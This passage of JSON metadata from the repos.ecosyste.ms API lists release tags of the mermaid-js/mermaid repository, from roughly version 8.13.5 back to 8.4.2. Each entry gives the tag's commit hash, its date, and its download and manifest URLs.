ithub/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/m